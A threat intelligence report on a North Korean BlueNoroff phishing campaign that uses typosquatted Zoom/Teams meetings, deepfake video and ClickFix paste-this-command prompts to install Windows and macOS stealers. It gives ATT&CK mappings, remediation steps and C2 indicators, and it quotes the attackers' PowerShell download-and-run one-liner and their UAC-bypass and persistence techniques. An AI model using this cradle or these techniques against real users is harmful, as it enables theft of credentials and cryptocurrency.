Threat reportMalwareTL-2026-1678

BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit: AI Deepfake Video Lures, ClickFix PowerShell Loaders, and Crypto Wallet/iCloud Keychain Theft

highACTIVE

BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit (TL-2026-1678), also tracked as ClickFake Interview, is a high-severity malware campaign, first published 2026-07-24. It is attributed to APT38 (North Korea) with high confidence, affects Microsoft Windows (all supported desktop versions), maps to 33 MITRE ATT&CK techniques (T1005, T1007, T1027), and is covered by 9 detection rules and 35 indicators of compromise.

Severity
HIGHAssessed severity
CVEs
0None referenced
Techniques
33MITRE ATT&CK
Actors
1APT38
Detection rules
9SPL · KQL · Sigma
IOCs
35Indicators of compromise

Key facts for TL-2026-1678

Threat ID
TL-2026-1678
Also known as
ClickFake Interview, Fake Zoom/Teams Deepfake Campaign
Severity
HIGH
Status
ACTIVE
Category
MALWARE
First published
Last reviewed
Attribution
APT38
Attribution confidence
HIGH
Nation-state nexus
North Korea
Motivation
FINANCIAL
Target sectors
cryptocurrency, blockchain, venture-capital, finance, investment, web3, technology
Target regions
North America, Europe, East Asia, Southeast Asia, united kingdom, Middle East
Detection rules
9
Indicators of compromise
35

Malware and tooling in BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit

Malware and tooling: CryptoBot, Root Troy V4, XScreen, Telegram Bot API

How BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit works

North Korean-aligned BlueNoroff (Lazarus Group financial sub-cluster) is running active ClickFix-style phishing campaigns using typosquatted Zoom/Teams meeting domains and AI-generated deepfake video to lure cryptocurrency and venture-capital professionals into running PowerShell/VBScript loaders (Windows) or shell-script stealers (macOS). Five distinct phishing-kit versions were identified between 31 May and 14 July 2026, disabling Defender, enumerating 25+ crypto wallet browser extensions, extracting Chrome master keys and iCloud Keychain data, and exfiltrating via Telegram bot API and dedicated C2 servers.

BlueNoroff, the financially motivated cybercrime sub-cluster of North Korea's Lazarus Group, is operating an active phishing-kit campaign publicly tracked (in overlapping reporting from Sekoia, Arctic Wolf, and Huntress) as "ClickFake Interview"/fake-meeting operations. The operation begins with social engineering over Telegram or LinkedIn/X using a hijacked or fabricated contact, a manipulated Calendly invite, and a typosquatted Zoom or Microsoft Teams domain (over 80 such domains identified, registered in bulk with a single hosting provider). Victims are drawn into a self-contained JavaScript fake meeting room that captures webcam video via getUserMedia and streams it to attacker infrastructure, seeding a self-reinforcing AI deepfake production pipeline (ChatGPT/GPT-4o generated portraits composited with real captured body movement using Adobe Premiere Pro, FFmpeg, and Microsoft Clipchamp) used to spoof legitimacy in subsequent calls.

Approximately eight seconds into the fake call, a ClickFix-style overlay prompts the victim to "fix" a fabricated audio/SDK error by copying and pasting a command; the attacker intercepts the clipboard and injects a PowerShell download-cradle (`powershell -ep bypass -c "(iwr ... -UseBasicParsing).Content | iex"`). This downloads a Base64/XOR (key 0x43) obfuscated second-stage PowerShell downloader that lands a further payload in `%TEMP%\chromechip.log`, disables/exclusions Microsoft Defender, and displays a fake "Zoom was updated successfully" dialog to dispel suspicion. A final in-memory PowerShell implant beacons every five seconds to a dedicated C2 (observed: `83.136.208.246:6783/api/daemon`), exfiltrating host reconnaissance data (hostname, username, OS build, timezone, running processes, admin/proxy status).

Post-exploitation modules include: Telegram Desktop session theft (`tdata`/`key_datas`) enabling account-hijack-driven onward campaigns; a Donut-loaded, MSVC-compiled native PE64 browser-credential stealer that recovers Chrome/Edge/Brave app-bound encryption keys via COM elevation (`IElevator`) and AES-256-GCM/BCrypt decryption, writing credentials to `pchr.csv`/`pmse.csv`/`pbra.csv`; screenshot capture via both direct HTTP POST and Telegram Bot API; UAC-bypass privilege escalation via the `Elevation:Administrator!new` COM moniker; and Startup-folder LNK persistence disguised as a Chrome updater (observed to persist up to 66 days).

On macOS, a fake Teams/Zoom `.pkg`/AppleScript installer (`zoom_sdk_support.scpt`) drops a modular toolset written in Go, Nim, Objective-C, Swift, and C/C++: a Go backdoor ("Root Troy V4"/`remoted`), a Go infostealer ("CryptoBot"/`airmond`), an Objective-C keylogger ("XScreen"/`keyboardd`) using Core Graphics EventTap, and a Nim-based persistent implant masquerading as "Telegram 2", installed as a LaunchDaemon (`/Library/LaunchDaemons/com.telegram2.update.agent.plist`) running hourly. The macOS toolset enumerates and exfiltrates data for 25+ cryptocurrency wallet browser extensions (MetaMask, Phantom, Rabby, OKX, Trust, TON, Sui, and others), extracts Chrome master keys sourced from iCloud Keychain, and captures keystrokes, screenshots, clipboard content, and audio, exfiltrating over HTTPS and WebSocket C2 channels and a dedicated Telegram channel ("Aurora").

Victimology skews heavily toward cryptocurrency/Web3 and adjacent finance/investment roles: of 100 identified targets in the Arctic Wolf dataset, 80% work in Web3/crypto, 76% hold C-level or founder titles, and targeting is concentrated during DPRK business hours (08:00-18:00 KST, Monday-Friday). The campaign is under continuous, rapid development — five distinct phishing-kit versions were fielded between 31 May and 14 July 2026 — consistent with a well-resourced, state-directed operation rather than opportunistic cybercrime.

MITRE ATT&CK techniques used in TL-2026-1678

Collection

T1005 Data from Local System; T1056 Input Capture; T1113 Screen Capture; T1115 Clipboard Data; T1123 Audio Capture

Discovery

T1007 System Service Discovery; T1033 System Owner/User Discovery; T1049 System Network Connections Discovery; T1082 System Information Discovery; T1083 File and Directory Discovery; T1087 Account Discovery; T1120 Peripheral Device Discovery; T1482 Domain Trust Discovery; T1518 Software Discovery

Defense Evasion

T1027 Obfuscated Files or Information; T1036 Masquerading; T1140 Deobfuscate/Decode Files or Information

Persistence

T1037 Boot or Logon Initialization Scripts; T1547 Boot or Logon Autostart Execution

Exfiltration

T1041 Exfiltration Over C2 Channel

Execution

T1059 Command and Scripting Interpreter; T1106 Native API; T1204 User Execution

collection

T1119 Automated Collection

Privilege Escalation

T1134 Access Token Manipulation; T1548 Abuse Elevation Control Mechanism

Credential Access

T1552 Unsecured Credentials; T1555 Credentials from Password Stores; T1557 Adversary-in-the-Middle

defense-impairment

T1553 Subvert Trust Controls; T1685 Disable or Modify Tools

Initial Access

T1566 Phishing

Reconnaissance

T1598 Phishing for Information

Affected products and versions in BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit

  • Microsoft — Windows (all supported desktop versions)
    Vulnerable versions: Windows 10; Windows 11
  • Apple — macOS
    Vulnerable versions: macOS 13; macOS 14; macOS 15
  • Google — Chrome / Chromium-based browsers (Chrome, Edge, Brave, Opera, Vivaldi, Chromium)
    Vulnerable versions: all versions storing app-bound encrypted credentials
  • Various — Cryptocurrency wallet browser extensions (MetaMask, Phantom, Rabby, OKX, Trust, Binance, Bitget, Coin, Keplr, Leather, Nabox, Rainbow, Ronin, SafePal, Sender, Station, SubWallet, Sui, TON, Tron, Unisat, Xverse)
    Vulnerable versions: all

Remediation for BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit

Immediate actions

  • Block identified typosquatted Zoom/Teams domains and observed C2 IPs (83.136.208.246, 83.136.209.22, 104.145.210.107) at DNS/perimeter firewall
  • Alert on and block execution of clipboard-pasted PowerShell one-liners invoked via 'iwr ... | iex' patterns
  • Enforce policy that meeting-software 'SDK updates' or troubleshooting steps are never requested via clipboard-paste-and-run prompts
  • Audit and restrict Microsoft Defender exclusion changes made outside of approved software deployment tooling
  • Hunt for Startup-folder LNK files disguised as browser updaters and for LaunchDaemon plists referencing 'telegram2' or similar masquerading names

Workarounds

  • Disable clipboard auto-paste/run affordances in terminal and PowerShell ISE where feasible
  • Restrict macOS AppleScript (.scpt) execution from Gatekeeper-quarantined downloads via configuration profile

Longer-term hardening

  • Deploy EDR with behavioral detection for in-memory/fileless PowerShell C2 beaconing and Donut-loaded shellcode execution
  • Mandate hardware wallets / air-gapped signing for high-value crypto/Web3 personnel rather than browser-extension hot wallets
  • Implement organization-wide policy requiring out-of-band verification of external meeting invites for finance/executive staff
  • Deploy application allow-listing to block unsigned/newly-compiled PE64 and Mach-O binaries in user-writable directories
  • Monitor for anomalous Telegram Desktop tdata access and bot-API-based outbound traffic as an exfiltration channel

Weaknesses (CWE) in BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit

CWE-451, CWE-311, CWE-522, CWE-494

Timeline of BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit

  • Sekoia TDR investigation first documents the 'ClickFake Interview' campaign attributed to Lazarus/BlueNoroff targeting crypto job seekers with fake interview sites deploying the GolangGhost backdoor.
  • First public reporting of BlueNoroff deploying deepfake video during fake Zoom calls to distribute a macOS backdoor against a crypto employee.
  • Arctic Wolf Labs-tracked intrusion begins via a manipulated Calendly invite and typosquatted Zoom link (uu01webzoom[.]us), later attributed with high confidence to BlueNoroff.
  • Additional typosquatted Teams/Zoom domains (teams.livesmeet[.]us, zoom.ue01web[.]us) registered as part of the ongoing infrastructure buildout (80+ domains total under one hosting provider).
  • Telegram Bot API exfiltration channel added to the screenshot-capture module as a second, in-memory exfiltration method.
  • Campaign activity reaches an observed peak of 121 recorded intrusion-related events in March 2026, consistent with DPRK business-hour operational tempo.
  • First of five distinct BlueNoroff phishing-kit versions identified in the current wave of active development.
  • Arctic Wolf publishes technical analysis 'BlueNoroff Uses ClickFix, Fileless PowerShell, and AI-Generated Fake Zoom Meetings to Target Web3 Sector,' detailing the C2 infrastructure, deepfake production pipeline, and 100-victim targeting dataset.
  • Fifth and most recent identified phishing-kit version fielded, marking the close of the observed May-July development window.
  • The Hacker News reports on the active BlueNoroff Zoom/Teams phishing kit campaign profiling crypto wallets, consolidating prior vendor reporting into a single public advisory.

Sources cited for BlueNoroff "ClickFake Interview" Zoom/Teams Phishing Kit

Detection coverage for TL-2026-1678

As of 2026-07-24, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1678 across Splunk SPL, Microsoft KQL and Sigma, covering 35 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
35 indicators of compromise · Red and above. Compare plans

Community OSINT corroboration for TL-2026-1678

3 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats